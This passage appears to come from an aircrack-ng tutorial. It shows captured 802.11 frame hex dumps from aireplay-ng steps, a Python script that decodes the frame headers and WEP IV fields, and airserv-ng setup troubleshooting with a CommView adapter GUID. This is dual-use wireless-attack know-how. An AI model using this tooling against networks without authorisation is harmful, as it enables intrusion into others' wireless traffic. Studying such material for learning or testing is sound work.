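0x0020: 6d6d b1e0 92a8 039b ca6f cecb 5364 6e16 mm.......o..Sdn.
0x0030: a21d 2a70 49cf eef8 f9b9 279c 9020 30c4 ..*pI.....'.. 0.
0x0040: 7013 f7f3 5953 1234 5727 146c eeaa a594 p...YS.4W'.l....
0x0050: fd55 66a2 030f 472d 2682 3957 8429 9ca5 .Uf...G-&.9W.)..
0x0060: 517f 1544 bd82 ad77 fe9a cd99 a43c 52a1 Q.D...w.....
0x0070: 0505 933f af2f 740e ...?./t.
"""
DUMP_STEP11 = """\
0x0000: 0841 0201 0014 6c7e 4080 000f b5ab cb9d .A....l~@.......
0x0010: ffff ffff ffff 8001 6c48 0000 0999 881a ........lH......
0x0020: 49fc 21ff 781a dc42 2f96 8fcc 9430 144d I.!.x..B/....0.M
0x0030: 3ab2 cff5 d4d1 6743 8056 24ec 9192 c1e1 :.....gC.V$.....
0x0040: d64f b709 .O..
"""

HEX4 = re.compile(r"^[0-9a-fA-F]{4}$")


def hexdump_to_bytes(dump: str) -> bytes:
    """Rebuild the raw frame from 'offset: xxxx xxxx ... gutter' lines."""
    out = bytearray()
    for line in dump.splitlines():
        tokens = line.split()
        if not tokens or not tokens[0].endswith(":"):
            continue
        for tok in tokens[1:]:
            if not HEX4.match(tok):
                break  # first non-hex token starts the ASCII gutter
            out += bytes.fromhex(tok)
    return bytes(out)


def mac(b: bytes) -> str:
    return ":".join(f"{x:02X}" for x in b)


@dataclass
class Dot11Header:
    frame_type: int        # 0 management, 1 control, 2 data
    subtype: int
    to_ds: bool
    from_ds: bool
    protected: bool        # the flag aireplay-ng prints as "(WEP)"
    bssid: str
    dest: str
    source: str
    wep_iv: Optional[bytes]
    wep_key_index: Optional[int]


def parse_dot11(frame: bytes) -> Dot11Header:
    """Decode the 24-byte 802.11 MAC header and, for protected frames, the WEP IV."""
    fc0, fc1 = frame[0], frame[1]
    frame_type = (fc0 >> 2) & 0x3
    subtype = (fc0 >> 4) & 0xF
    to_ds = bool(fc1 & 0x01)
    from_ds = bool(fc1 & 0x02)
    protected = bool(fc1 & 0x40)
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    # The meaning of the three address fields depends on the DS bits.
    if to_ds and not from_ds:          # station -> AP
        bssid, source, dest = a1, a2, a3
    elif from_ds and not to_ds:        # AP -> station
        dest, bssid, source = a1, a2, a3
    elif not to_ds and not from_ds:    # management / ad-hoc
        dest, source, bssid = a1, a2, a3
    else:
        raise ValueError("4-address WDS frame not handled")
    wep_iv = wep_key_index = None
    if protected:
        # WEP: 3-byte IV, then a key-ID byte whose top two bits select the key.
        wep_iv = frame[24:27]
        wep_key_index = frame[27] >> 6
    return Dot11Header(frame_type, subtype, to_ds, from_ds, protected,
                       mac(bssid), mac(dest), mac(source), wep_iv, wep_key_index)


def describe(frame: bytes) -> str:
    """The one-line summary aireplay-ng prints above each dump."""
    h = parse_dot11(frame)
    flag = " (WEP)" if h.protected else ""
    return f"Size: {len(frame)}, FromDS: {int(h.from_ds)}, ToDS: {int(h.to_ds)}{flag}"


if __name__ == "__main__":
    for dump in (DUMP_STEP9, DUMP_STEP11):
        frame = hexdump_to_bytes(dump)
        print(describe(frame))
        print(parse_dot11(frame))
```

Decoding the step 9 frame gives FromDS=1, so address 2 is the BSSID (00:14:6C:7E:40:80) and address 3 the wired-side source; the step 11 frame has ToDS=1, so the BSSID moves to address 1 and the broadcast destination to address 3, which is exactly the labelling the tool printed. The 3-byte IV and key index sitting in the clear right after the header are what make WEP frames trivially identifiable on the air.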

Problems?

type this in the command window where the airserv command failed:
airserv-ng -d "commview.dll|debug"

Quotes are important!

You will probably get something like this:
Opening card commview.dll|debug
Name: [CommView] Proxim ORiNOCO 802.11b/g ComboCard Gold 8470
get_guid: name: {
15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82} desc: ORiNOCO 802.11bg Co
mboCard Gold - Paketplaner-Miniport
Adapter not found
get_guid()
airserv-ng: wi_open(): No error


now type this:
airserv-ng -d "commview.dll|{15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82}"

Quotes are important!

The GUID in braces must be the one printed in the debug output above (it probably differs for everyone).